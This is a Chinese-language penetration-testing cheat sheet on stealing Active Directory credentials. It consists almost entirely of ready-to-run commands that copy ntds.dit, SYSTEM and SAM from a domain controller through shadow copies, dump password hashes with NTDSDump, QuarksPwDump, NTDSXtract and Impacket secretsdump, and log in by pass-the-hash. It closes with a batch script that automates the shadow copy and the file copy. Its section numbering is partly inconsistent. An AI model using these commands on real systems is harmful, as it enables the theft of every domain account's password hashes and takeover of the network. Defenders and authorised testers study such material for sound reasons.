1.vsssown.vbs拷貝域數據庫:
1.1上傳vssown.vbs文件
上傳cscript.exe和vssown.vbs到域服務器上
1.2創建快照
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NTDS\Parameters //得到ntds的默認路徑:c:\ Windows\NTDS\ntds.dit cd 桌面 cscript //nologo vssown.vbs /start //啟用 cscript //nologo vssown.vbs /status //查看運行狀態 cscript //nologo vssown.vbs /create C //在C盤下創建副本卷影 cscript //nologo vssown.vbs /list >d:\jy.txt //查看創建的快照信息並輸出到d:\jy.txt
1.3獲取域據庫ntds.dit
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\windows\ntds\ntds.dit d: //拷貝ntds.dit到D盤,有時候ntds.dit不在默認路徑,需要通過注冊表查詢到路徑 copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\windows\system32\config\SYSTEM d: //拷貝system到D盤 copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\windows\system32\config\SAM d: //拷貝sam到D盤 cscript //nologo vssown.vbs /delete {B3475A72-86D2-48EC-A22F-6E8DBB82903D} //刪除卷影
2.vshadow.exe拷貝域數據庫:
vshadow.exe -exec=%ComSpec% C: //在C盤下創建副本卷影 copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\windows\system32\config\system d: copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\windows\ntds\ntds.dit d: copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\windows\system32\config\SAM d:
3.vssadmin拷貝域數據庫:
vssadmin create shadow /for=c: //在C盤下創建副本卷影 copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\Windows\NTDS\ntds.dit d:\ntds.dit copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\Windows\System32\config\SYSTEM d:\system.hive copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\windows\system32\config\SAM d:\sam
4.NTDSDump導出域數據庫hash值:
4.1 ntsdump命令幫助
ntdsdump.exe <-f ntds.dit> <-k HEX-SYS-KEY | -s system.hiv> [-o out.txt] [-h] [-t JOHN|LC] -f ntds.dit路徑 -k 可選的十六進制格式的SYSKEY -s 可選的system.hiv路徑 -h 導出歷史密碼記錄 -t 導出格式,LC或JOHN -o 導出到指定文件中
4.2 ntdsdump快速導出hash值
NTDSDump.exe -f ntds.dit -s SYSTEM -h -t john(或者lc) -o SecPulseHash.txt //快速導出HASH值
5.ntdsutil.exe + QuarksPwDump.exe導出hash值:
5.1quarkspwdump命令幫助
-dhl 導出本地哈希值 -dhdc導出內存中的域控哈希值 -dhd 導出域控哈希值,必須指定NTDS文件 -db 導出Bitlocker信息,必須指定NTDS文件 -nt 導出ntds文件 -hist 導出歷史信息,可選項 -t 導出類型可選默認導出為John類型。 -o 導出文件到本地 QuarksPwDumpv0.2b.exe -dhl -o bk.txt //導出本地哈希值到當前目錄的bk.tx quarks-pwdump.exe --dump-hash-domain --with-history //導出本機域控歷史存儲的hash值 quarks-pwdump.exe --dump-bitlocker --output c:\bitlocker.txt --ntds-file c:\ntds.dit
5.2創建快照:
ntdsutil snapshot "activate instance ntds" create quit quit
5.3 Ntdsutil掛載域快照:
ntdsutil snapshot "mount{a0455f6c-40c3-4b56-80a0-80261471522c}" quit quit 快照 {5e0d92d3-992d-42b9-bbd5-9c85e5dc7827} 已掛接為 C:\$SNAP_201212082315_VOLUMEC$\
5.4 復制快照
copy C:\$SNAP_201212082315_VOLUMEC$\windows\NTDS\ntds.dit c:\ntds.dit
5.5 卸載快照:
ntdsutil snapshot "unmount{5e0d92d3-992d-42b9-bbd5-9c85e5dc7827}" quit quit
5.6 刪除快照
ntdsutil snapshot "delete{5e0d92d3-992d-42b9-bbd5-9c85e5dc7827}" quit quit ntsutil.exe +PWPR(Passcape Windows Password Recovery)
5.7ntdsutil導出ntds.dit和system
#ntdsutil
#snapshot
#activate instance ntds
#create
#mount {GUID}
copy c:\{掛載點}\WINDOWS\NTDS\NTDS.dit c:\NTDS_saved.dit (可手動復制)(新窗口復制)
copy c:\{掛載點}\WINDOWS\system32\config\system c:\system
#unmount {GUID}
#delete {GUID}
#quit
#quit
最后通過PWPR(Passcape Windows Password Recovery)的GPU本地在線破解hash值
5.7 域控上執行導出hash值:
QuarksPwDump.exe --dump-hash-domain --ntds-file c:\ntds.dit --output SecPulseHash.txt //建議在域控制器上執行,不然會下載下來出錯 QuarksPwDump.exe -dhd -hist -nt ntds.dit -o log.txt //修復離線下載的ntds.dit
5.8 導出system文件
reg save hklm\system system.hive //導出system文件
5.9離線下載本地導出hash值
quarks-pwdump.exe --dump-hash-domain --ntds-file C:\pentest\NTDS.dit -sf C:\pentest\SYSTEM -o hashes.txt //離線導出ntds.dit的hash值
6.libesedb+ NtdsXtract導出域數據庫hash值:
6.1 ubuntu上安裝libesedb的先決條件:
sudo apt install autoconf automake autopoint libtool pkg-config //安裝先決條件
6.2 安裝libesedb:
git clone https://github.com/libyal/libesedb.git cd libesedb/ ./synclibs.sh ./autogen.sh ./configure make sudo make install //默認安裝在/usr/local/bin下 ldconfig
6.3 分離ntds.dit數據庫
root@kali:/usr/local/bin# esedbexport -m tables /opt/ntds.dit // 將ntds.dit和sam以及system下載到本地kali桌面中的hashdumpwork目錄下,然后分離出數據表來,會在目錄下生 成一個目錄ntds.dit.export的文件夾
7.4安裝NTDSXtract
wget https://github.com/csababarta/ntdsxtract/archive/e2fc6470cf54d9151bed394ce9ad3cd25be7c262.zip unzip e2fc6470cf54d9151bed394ce9ad3cd25be7c262.zip cd ntdsxtract-e2fc6470cf54d9151bed394ce9ad3cd25be7c262/ python setup.py install
7.5 ntds腳本導出hash值
root@kali:# python dsusers.py /usr/local/bin/ntds.dit.export/datatable.4 /usr/local/bin/ntds.dit.export/link_table.7 /root/Desktop/hashdumpwork --syshive /root/Desktop/SYSTEM --passwordhashes --lmoutfile /root/Desktop/lm-out.txt --ntoutfile /root/Desktop/nt-out.txt --pwdformat ophc(或者john)
7. Impacket's secretsdump導出域數據庫hash值:
python secretsdump.py -ntds /opt/ntds.dit -system /opt/system.hive local
7.1 Impacket's secretsdump腳本域hash傳遞登錄:
python secretsdump.py -hashes 0000000000000000000000000:f9bccbbbdkkkkkkddjjjkkjfjjggj bk/bk.org@192.168.1.100
8.附錄
附錄:批處理導出ntds.dit文件
setlocal @REM test if we are called by VSHADOW if NOT “%CALLBACK_SCRIPT%”==”” goto :IS_CALLBACK @REM @REM Get the source and destination path @REM set SOURCE_DRIVE_LETTER=%~d1 set SOURCE_RELATIVE_PATH=%~pnx1 set DESTINATION_PATH=%2 @REM @REM Create the shadow copy – and generate env variables into a temporary script. @REM @REM Then, while the shadow is still live @REM recursively execute the same script. @REM @echo …Determine the scripts to be executed/generated… set CALLBACK_SCRIPT=%~dpnx0 set TEMP_GENERATED_SCRIPT=GeneratedVarsTempScript.cmd @echo …Creating the shadow copy… %~dp0\vshadow.exe -script=%TEMP_GENERATED_SCRIPT% -exec=%CALLBACK_SCRIPT% %SOURCE_DRIVE_LETTER% del /f %TEMP_GENERATED_SCRIPT% @goto :EOF :IS_CALLBACK setlocal @REM @REM This generated script should set the SHADOW_DEVICE_1 env variable @REM @echo …Obtaining the shadow copy device name… call %TEMP_GENERATED_SCRIPT% @REM @REM This should copy the file to the right location @REM @echo …Copying from the shadow copy to the destination path… copy “%SHADOW_DEVICE_1%\%SOURCE_RELATIVE_PATH%” %DESTINATION_PATH%